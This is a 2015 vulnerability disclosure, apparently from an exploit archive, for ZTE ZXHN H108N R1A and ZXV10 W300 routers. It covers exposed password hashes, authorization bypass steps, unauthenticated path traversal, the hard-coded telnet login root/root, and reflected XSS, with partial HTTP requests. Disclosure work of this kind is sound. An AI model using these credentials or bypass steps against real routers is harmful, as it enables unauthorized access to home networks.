ZTE ZXHN H108N R1A / ZXV10 W300 Traversal / Disclosure / Authorization

Related Vulnerabilities: CVE-2015-7248   CVE-2015-7249   CVE-2015-7250   CVE-2015-7251   CVE-2015-7252  
Publish Date: 20 Nov 2015
                # Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE

ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.

*Note*: Large deployment size, primarily in Peru, used by TdP.

*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of


Login Page source contents:

//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index

B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.

*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249

By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.

PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.

PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.

Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password


Other functions / pages may also be accessible to non-privileged users.

*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.

Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.


HTTP POST request

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177


HTTP Response

HTTP/1.0 200 OK
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=7ce7bd4a; expires=Fri, 31­Dec­9999 23:59:59


*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.

*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252

In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].


POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177


Best Regards,
Karn Ganeshen